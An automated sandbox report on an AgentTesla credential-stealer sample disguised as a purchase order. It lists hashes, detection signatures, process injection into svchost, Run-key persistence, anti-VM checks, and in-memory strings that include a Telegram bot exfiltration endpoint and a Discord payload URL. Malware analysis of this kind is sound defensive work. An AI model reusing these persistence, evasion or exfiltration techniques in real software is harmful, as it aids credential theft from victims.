Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New Order PO20011046.exe

Overview

General Information

Sample Name:New Order PO20011046.exe
Analysis ID:324078
MD5:310a7ca550b9997d0e0bcaf645530303
SHA1:5617d1e233381ea3fd6ab796fcc6a2de66137c51
SHA256:0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
Tags:ESPexegeo

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Writes to foreign memory regions
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • New Order PO20011046.exe (PID: 7048 cmdline: 'C:\Users\user\Desktop\New Order PO20011046.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
    • svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • cmd.exe (PID: 6960 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • New Order PO20011046.exe (PID: 1256 cmdline: C:\Users\user\Desktop\New Order PO20011046.exe MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 5488 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • Evvudrv.exe (PID: 4868 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe' MD5: 310A7CA550B9997D0E0BCAF645530303)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\uvvE.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x9b:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\uvvE.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\uvvE.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x70:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.New Order PO20011046.exe.4a80000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.2.New Order PO20011046.exe.4b40000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                11.2.New Order PO20011046.exe.4b40000.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.New Order PO20011046.exe.4a80000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Svchost ProcessShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700
                    Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order PO20011046.exe' , ParentImage: C:\Users\user\Desktop\New Order PO20011046.exe, ParentProcessId: 7048, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 6700

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeReversingLabs: Detection: 68%
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: New Order PO20011046.exeVirustotal: Detection: 32%Perma Link
                    Source: New Order PO20011046.exeReversingLabs: Detection: 68%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJoe Sandbox ML: detected
                    Machine Learning detection for sampleShow sources
                    Source: New Order PO20011046.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 4x nop then mov eax, dword ptr [00460BCCh]
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 4x nop then mov eax, ecx
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 4x nop then mov eax, dword ptr [00460BCCh]
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 4x nop then mov eax, ecx
                    Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: unknownDNS traffic detected: queries for: discord.com
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://hltGXE.com
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/Evvured
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/
                    Source: Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmpString found in binary or memory: https://discord.com/J
                    Source: New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

                    System Summary:

                    barindex
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: New Order PO20011046.exe
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DB9BA NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DB97F NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Windows\assembly\Desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02BDA4F4
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00406C50
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402860
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0041A47E
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00408C10
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00418C8C
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401650
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00418204
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402ED0
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402B40
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00418748
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00407350
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00402F39
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_0040DBD1
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00407BEF
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00419384
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeCode function: 16_3_02D1A4F4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 50484278 appears 51 times
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: String function: 0040E198 appears 44 times
                    Source: New Order PO20011046.exeStatic PE information: invalid certificate
                    Source: New Order PO20011046.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: New Order PO20011046.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Evvudrv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: Evvudrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: New Order PO20011046.exe, 0000000B.00000001.758964598.0000000000448000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameuszkpYZrHmwlxpeBdJLqZbZT.exe4 vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs New Order PO20011046.exe
                    Source: New Order PO20011046.exe, 0000000B.00000002.922240026.0000000005300000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbemdisp.tlbj% vs New Order PO20011046.exe
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                    Source: C:\Users\user\AppData\Local\uvvE.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@15/7@6/4
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DA9DA AdjustTokenPrivileges,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DA9A3 AdjustTokenPrivileges,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_5048789A GetDiskFreeSpaceA,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: New Order PO20011046.exeVirustotal: Detection: 32%
                    Source: New Order PO20011046.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile read: C:\Users\user\Desktop\New Order PO20011046.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\New Order PO20011046.exe 'C:\Users\user\Desktop\New Order PO20011046.exe'
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe'
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile written: C:\Windows\assembly\Desktop.iniJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: New Order PO20011046.exeStatic file information: File size 1311424 > 1048576
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: Binary string: _.pdb source: New Order PO20011046.exe, 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeUnpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeUnpacked PE file: 11.2.New Order PO20011046.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C137 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D536 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237943F push edi; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B338 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C724 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379C23 push ebx; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379E14 push ebx; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C81F push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D61B push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D207 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D607 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237997C push ebx; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B178 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237926C push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379A6C push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D153 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237D24E push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B0B3 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237A7B0 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C1A9 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237A392 push edi; iretd
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237949D push ebx; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C49C push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B287 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C2FC push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237B5E4 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C4EF push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02379EE9 push ebx; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C5D6 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_0237C3C2 push esi; retf
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 0_3_02BD1AA4 push 00440316h; ret
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EvvuJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EvvuJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess information set: NOOPENFILEERRORBOX
